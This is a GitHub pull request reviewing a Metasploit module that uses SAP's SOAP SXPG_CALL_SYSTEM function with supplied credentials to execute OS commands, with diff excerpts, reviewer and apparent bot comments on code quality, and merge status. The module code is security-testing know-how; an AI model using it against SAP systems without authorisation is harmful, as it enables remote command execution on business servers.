SAP SOAP RFC SXPG_CALL_SYSTEM #1034

Merged
merged 2 commits into from Nov 20, 2012

2 participants

@nmonkee

This module makes use of the SXPG_CALL_SYSTEM Remote Function Call (via SOAP) to execute OS commands as configured in SM69.

@brandonprry brandonprry and 2 others commented on an outdated diff Nov 9, 2012
...uxiliary/scanner/sap/sap_soap_rfc_sxpg_call_system.rb
+ 'Version' => '$Revision',
+ 'Description' => %q{
+ This module makes use of the SXPG_CALL_SYSTEM Remote Function Call (via SOAP) to execute OS commands as configured in SM69.
+ },
+ 'References' => [[ 'URL', 'http://labs.mwrinfosecurity.com' ]],
+ 'Author' => [ 'Agnivesh Sathasivam','nmonkee' ],
+ 'License' => BSD_LICENSE
+ )
+ register_options(
+ [
+ OptString.new('CLIENT', [true, 'Client', nil]),
+ OptString.new('USERNAME', [true, 'Username', nil]),
+ OptString.new('PASSWORD', [true, 'Password', nil]),
+ OptString.new('CMD', [true, 'Command to be executed', nil]),
+ OptString.new('PARAM', [false, 'Additional parameters', nil]),
+ OptEnum.new('OS', [true, 'Target OS','ANYOS',['ANYOS', 'UNIX', 'Windows NT', 'AS/400', 'OS/400']]),
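Review bot: `'Version' => '$Revision'` on the first line of this hunk is an SVN keyword left unexpanded (and missing its closing `$`), so it will never carry a real value; drop the key. The option descriptions `'Client'`, `'Username'` and `'Password'` should say what they refer to, e.g. `'SAP client number'` and `'SAP username'`, so someone reading `show options` knows what to supply.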
@brandonprry
brandonprry added a line comment Nov 9, 2012

trailing comma

@jvazquez-r7
jvazquez-r7 added a line comment Nov 14, 2012

If it can execute os commands it could be converted into an exploit

@nmonkee
nmonkee added a line comment Nov 14, 2012

@brandonprry brandonprry commented on an outdated diff Nov 9, 2012
...uxiliary/scanner/sap/sap_soap_rfc_sxpg_call_system.rb
+ data << '</n1:SXPG_CALL_SYSTEM>'
+ data << '</env:Body>'
+ data << '</env:Envelope>'
+ user_pass = Rex::Text.encode_base64(datastore['USERNAME'] + ":" + datastore['PASSWORD'])
+ print_status("[SAP] #{ip}:#{rport} - sending SOAP SXPG_COMMAND_EXECUTE request")
+ begin
+ res = send_request_raw({
+ 'uri' => '/sap/bc/soap/rfc?sap-client=' + datastore['CLIENT'] + '&sap-language=EN',
+ 'method' => 'POST',
+ 'data' => data,
+ 'headers' =>{
+ 'Content-Length' => data.size.to_s,
+ 'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions',
+ 'Cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'],
+ 'Authorization' => 'Basic ' + user_pass,
+ 'Content-Type' => 'text/xml; charset=UTF-8',
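Review bot: the `print_status` line says `SXPG_COMMAND_EXECUTE` while the envelope closed two lines above it is `</n1:SXPG_CALL_SYSTEM>`; make the message name the function actually called, since operators grep logs for it. `'Content-Length' => data.size.to_s` is a character count rather than a byte count, so it is wrong as soon as the command or parameters contain multibyte characters; use `data.bytesize.to_s`, or omit the header if the HTTP client mixin derives it from the body.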
@brandonprry
brandonprry added a line comment Nov 9, 2012

trailing comma

@brandonprry brandonprry commented on an outdated diff Nov 9, 2012
...uxiliary/scanner/sap/sap_soap_rfc_sxpg_call_system.rb
+ user_pass = Rex::Text.encode_base64(datastore['USERNAME'] + ":" + datastore['PASSWORD'])
+ print_status("[SAP] #{ip}:#{rport} - sending SOAP SXPG_COMMAND_EXECUTE request")
+ begin
+ res = send_request_raw({
+ 'uri' => '/sap/bc/soap/rfc?sap-client=' + datastore['CLIENT'] + '&sap-language=EN',
+ 'method' => 'POST',
+ 'data' => data,
+ 'headers' =>{
+ 'Content-Length' => data.size.to_s,
+ 'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions',
+ 'Cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'],
+ 'Authorization' => 'Basic ' + user_pass,
+ 'Content-Type' => 'text/xml; charset=UTF-8',
+ }
+ }, 45)
+ if (res and res.code != 500 and res.code != 200)
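Review bot: the test `if (res and res.code != 500 and res.code != 200)` on the last line treats a `nil` response (for instance the 45-second timeout passed to `send_request_raw` expiring) as success, because the whole condition is false when `res` is nil and control falls into the `else` branch. Handle `res.nil?` first with its own `print_error` and `return`, then test the status code; the outer parentheses can go at the same time.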
@brandonprry
brandonprry added a line comment Nov 9, 2012

if res and res.code != 500 and res.code != 200

@brandonprry brandonprry commented on an outdated diff Nov 9, 2012
...uxiliary/scanner/sap/sap_soap_rfc_sxpg_call_system.rb
+ print_error("[SAP] #{ip}:#{rport} - something went wrong!")
+ return
+ else
+ success = true
+ print_status("[SAP] #{ip}:#{rport} - got response")
+ saptbl = Msf::Ui::Console::Table.new(
+ Msf::Ui::Console::Table::Style::Default,
+ 'Header' => "[SAP] SXPG_CALL_SYSTEM ",
+ 'Prefix' => "\n",
+ 'Postfix' => "\n",
+ 'Indent' => 1,
+ 'Columns' =>["Output",]
+ )
+ response = res.body
+ if response =~ /faultstring/
+ error = response.scan(%r{<faultstring>(.*?)</faultstring>}).flatten
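Review bot: `%r{<faultstring>(.*?)</faultstring>}` on the last line has no `m` flag, so a fault string containing a newline is silently missed even though `response =~ /faultstring/` matched; add `m`, and since a SOAP fault carries a single `<faultstring>`, `response.match(...)[1]` is clearer than `scan(...).flatten`. `success = true` is also set before the body has been looked at; set it only once the `<MESSAGE>` elements have been parsed.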
@brandonprry
brandonprry added a line comment Nov 9, 2012

.flatten? Are you expecting more than one fault string? If so, more appropriate ways of doing this exist.

@brandonprry brandonprry commented on an outdated diff Nov 9, 2012
...uxiliary/scanner/sap/sap_soap_rfc_sxpg_call_system.rb
+ return
+ else
+ success = true
+ print_status("[SAP] #{ip}:#{rport} - got response")
+ saptbl = Msf::Ui::Console::Table.new(
+ Msf::Ui::Console::Table::Style::Default,
+ 'Header' => "[SAP] SXPG_CALL_SYSTEM ",
+ 'Prefix' => "\n",
+ 'Postfix' => "\n",
+ 'Indent' => 1,
+ 'Columns' =>["Output",]
+ )
+ response = res.body
+ if response =~ /faultstring/
+ error = response.scan(%r{<faultstring>(.*?)</faultstring>}).flatten
+ sucess = false
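Review bot: `sucess = false` on the last line creates a new local instead of clearing the `success` set a few lines above, so after a SOAP fault `success` stays `true`, the empty table is printed and the fault handling never runs. Beyond fixing the spelling, printing the fault right here and returning would remove the need for the flag altogether.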
@brandonprry
brandonprry added a line comment Nov 9, 2012

typo?

@brandonprry brandonprry commented on an outdated diff Nov 9, 2012
...uxiliary/scanner/sap/sap_soap_rfc_sxpg_call_system.rb
+ )
+ response = res.body
+ if response =~ /faultstring/
+ error = response.scan(%r{<faultstring>(.*?)</faultstring>}).flatten
+ sucess = false
+ end
+ output = response.scan(%r{<MESSAGE>([^<]+)</MESSAGE>}).flatten
+ for i in 0..output.length-1
+ saptbl << [output[i]]
+ end
+ end
+ rescue ::Rex::ConnectionError
+ print_error("[SAP] #{ip}:#{rport} - Unable to connect")
+ return
+ end
+ if success == true
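Review bot: `for i in 0..output.length-1` / `saptbl << [output[i]]` indexes an array by hand; `output.each { |line| saptbl << [line] }` is the idiomatic form. The `<MESSAGE>([^<]+)</MESSAGE>` captures are still XML-escaped (`&lt;`, `&amp;`, `&quot;` in command output), so unescape them with `CGI.unescapeHTML` before adding them to the table, otherwise the printed output does not match what the command returned.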
@brandonprry
brandonprry added a line comment Nov 9, 2012

if success

@brandonprry brandonprry commented on an outdated diff Nov 9, 2012
...uxiliary/scanner/sap/sap_soap_rfc_sxpg_call_system.rb
+ error = response.scan(%r{<faultstring>(.*?)</faultstring>}).flatten
+ sucess = false
+ end
+ output = response.scan(%r{<MESSAGE>([^<]+)</MESSAGE>}).flatten
+ for i in 0..output.length-1
+ saptbl << [output[i]]
+ end
+ end
+ rescue ::Rex::ConnectionError
+ print_error("[SAP] #{ip}:#{rport} - Unable to connect")
+ return
+ end
+ if success == true
+ print(saptbl.to_s)
+ end
+ if sucess == false
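Review bot: `if success == true` followed by `if sucess == false` are two independent tests on two differently spelled variables; with the typo fixed they are the two arms of one condition, so write `if success ... else ... end`. Comparing a boolean against `== true` / `== false` adds nothing in Ruby.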
@brandonprry
brandonprry added a line comment Nov 9, 2012

typo

Also, if !success

Or if not success if you are feeling verbose

@brandonprry brandonprry commented on an outdated diff Nov 9, 2012
...uxiliary/scanner/sap/sap_soap_rfc_sxpg_call_system.rb
+ sucess = false
+ end
+ output = response.scan(%r{<MESSAGE>([^<]+)</MESSAGE>}).flatten
+ for i in 0..output.length-1
+ saptbl << [output[i]]
+ end
+ end
+ rescue ::Rex::ConnectionError
+ print_error("[SAP] #{ip}:#{rport} - Unable to connect")
+ return
+ end
+ if success == true
+ print(saptbl.to_s)
+ end
+ if sucess == false
+ for i in 0..error.length-1
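Review bot: `for i in 0..error.length-1` on the last line again loops by index; `error.each { |msg| print_error(...) }` reads better and cannot go off by one. `error` is only assigned inside the fault branch, so this loop depends on `sucess == false` implying that branch ran; reporting the fault where it is detected removes that coupling.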
@brandonprry
brandonprry added a line comment Nov 9, 2012

0.upto(error.length-1) do |i|

@jvazquez-r7

msftidy warnings should be deleted:

$ tools/msftidy.rb modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_call_system.rb 
sap_soap_rfc_sxpg_call_system.rb:9 - [WARNING] Spaces at EOL
sap_soap_rfc_sxpg_call_system.rb:10 - [WARNING] Spaces at EOL
sap_soap_rfc_sxpg_call_system.rb:12 - [ERROR] Unicode detected: "# Mariano Nu\xC3\xB1ez (the author of the Bizploit framework) helped me in my efforts\n"
sap_soap_rfc_sxpg_call_system.rb:14 - [WARNING] Spaces at EOL
sap_soap_rfc_sxpg_call_system.rb:15 - [WARNING] Spaces at EOL
sap_soap_rfc_sxpg_call_system.rb:26 - [WARNING] Spaces at EOL
sap_soap_rfc_sxpg_call_system.rb:37 - [WARNING] Spaces at EOL
sap_soap_rfc_sxpg_call_system.rb:48 - [WARNING] Spaces at EOL
@jvazquez-r7 jvazquez-r7 commented on an outdated diff Nov 14, 2012
...uxiliary/scanner/sap/sap_soap_rfc_sxpg_call_system.rb
+# experience - a very cool guy. I'd also like to thank Chris John Riley,
+# Ian de Villiers and Joris van de Vis who have Beta tested the modules and
+# provided excellent feedback. Some people just seem to enjoy hacking SAP :)
+##
+
+require 'msf/core'
+
+class Metasploit4 < Msf::Auxiliary
+
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Auxiliary::Report
+ include Msf::Auxiliary::Scanner
+
+ def initialize
+ super(
+ 'Name' => 'SAP SOAP RFC SXPG_CALL_SYSTEM',
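Review bot: `include Msf::Auxiliary::Report` is pulled in, but no `report_*` call appears in any of the visible hunks; either record the outcome (for instance a `report_note` with the command output or the fault string) so it lands in the database alongside the other scanner results, or drop the include.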
@jvazquez-r7
jvazquez-r7 added a line comment Nov 14, 2012

Names should be a little more descriptive

@jvazquez-r7 jvazquez-r7 commented on an outdated diff Nov 14, 2012
...uxiliary/scanner/sap/sap_soap_rfc_sxpg_call_system.rb
+# Ian de Villiers and Joris van de Vis who have Beta tested the modules and
+# provided excellent feedback. Some people just seem to enjoy hacking SAP :)
+##
+
+require 'msf/core'
+
+class Metasploit4 < Msf::Auxiliary
+
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Auxiliary::Report
+ include Msf::Auxiliary::Scanner
+
+ def initialize
+ super(
+ 'Name' => 'SAP SOAP RFC SXPG_CALL_SYSTEM',
+ 'Version' => '$Revision',
@jvazquez-r7
jvazquez-r7 added a line comment Nov 14, 2012

not needed anymore

@jvazquez-r7 jvazquez-r7 commented on an outdated diff Nov 14, 2012
...uxiliary/scanner/sap/sap_soap_rfc_sxpg_call_system.rb
+require 'msf/core'
+
+class Metasploit4 < Msf::Auxiliary
+
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Auxiliary::Report
+ include Msf::Auxiliary::Scanner
+
+ def initialize
+ super(
+ 'Name' => 'SAP SOAP RFC SXPG_CALL_SYSTEM',
+ 'Version' => '$Revision',
+ 'Description' => %q{
+ This module makes use of the SXPG_CALL_SYSTEM Remote Function Call (via SOAP) to execute OS commands as configured in SM69.
+ },
+ 'References' => [[ 'URL', 'http://labs.mwrinfosecurity.com' ]],
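Review bot: the `Description` states the mechanism but not the preconditions an operator needs: the call goes to the `/sap/bc/soap/rfc` endpoint with the supplied `CLIENT`, `USERNAME` and `PASSWORD`, and only commands already defined in SM69 can be named in `CMD`. Saying so in the description avoids runs that fail for reasons the module cannot explain.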
@jvazquez-r7
jvazquez-r7 added a line comment Nov 14, 2012

no general references pls

@jvazquez-r7 jvazquez-r7 commented on an outdated diff Nov 14, 2012
...uxiliary/scanner/sap/sap_soap_rfc_sxpg_call_system.rb
+class Metasploit4 < Msf::Auxiliary
+
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Auxiliary::Report
+ include Msf::Auxiliary::Scanner
+
+ def initialize
+ super(
+ 'Name' => 'SAP SOAP RFC SXPG_CALL_SYSTEM',
+ 'Version' => '$Revision',
+ 'Description' => %q{
+ This module makes use of the SXPG_CALL_SYSTEM Remote Function Call (via SOAP) to execute OS commands as configured in SM69.
+ },
+ 'References' => [[ 'URL', 'http://labs.mwrinfosecurity.com' ]],
+ 'Author' => [ 'Agnivesh Sathasivam','nmonkee' ],
+ 'License' => BSD_LICENSE
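Review bot: `'Author' => [ 'Agnivesh Sathasivam','nmonkee' ]` is missing the space after the comma; `[ 'Agnivesh Sathasivam', 'nmonkee' ]` is the usual style for the metadata block.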
@jvazquez-r7
jvazquez-r7 added a line comment Nov 14, 2012

Can MSF_LICENSE be used?

@jvazquez-r7 jvazquez-r7 commented on an outdated diff Nov 14, 2012
...uxiliary/scanner/sap/sap_soap_rfc_sxpg_call_system.rb
+ if (res and res.code != 500 and res.code != 200)
+ # to do - implement error handlers for each status code, 404, 301, etc.
+ print_error("[SAP] #{ip}:#{rport} - something went wrong!")
+ return
+ else
+ success = true
+ print_status("[SAP] #{ip}:#{rport} - got response")
+ saptbl = Msf::Ui::Console::Table.new(
+ Msf::Ui::Console::Table::Style::Default,
+ 'Header' => "[SAP] SXPG_CALL_SYSTEM ",
+ 'Prefix' => "\n",
+ 'Postfix' => "\n",
+ 'Indent' => 1,
+ 'Columns' =>["Output",]
+ )
+ response = res.body
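Review bot: the `# to do` comment on the second line leaves every status other than 200 and 500 as `something went wrong!`, but 401 and 403 are exactly the codes that tell the operator the supplied `CLIENT`/`USERNAME`/`PASSWORD` were rejected, and a 404 typically means the SOAP RFC endpoint is not exposed; report at least those distinctly, including `res.code` in the `print_error`. A comment explaining that 500 is allowed through because SOAP faults arrive as HTTP 500 with a `<faultstring>` body would help the next reader, and `res` needs a nil check before `res.code` and `res.body` are read.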
@jvazquez-r7
jvazquez-r7 added a line comment Nov 14, 2012

res should be checked against nil before accessing it here I think

@jvazquez-r7 jvazquez-r7 referenced this pull request in nmonkee/metasploit-framework Nov 20, 2012
Merged

cleanup for sap_soap_rfc_sxpg_call_system.rb ref #1034 #2

@jvazquez-r7

Pull request with cleanup done to your repo. If you can test the cleanup version and, if it works, share pcaps and land it, I think we'll be ready to merge :)

Really thanks!

@jvazquez-r7

Awesome, looks good, merging!

@jvazquez-r7 jvazquez-r7 merged commit be66ccd into rapid7:master Nov 20, 2012

1 check failed

Details default The Travis build failed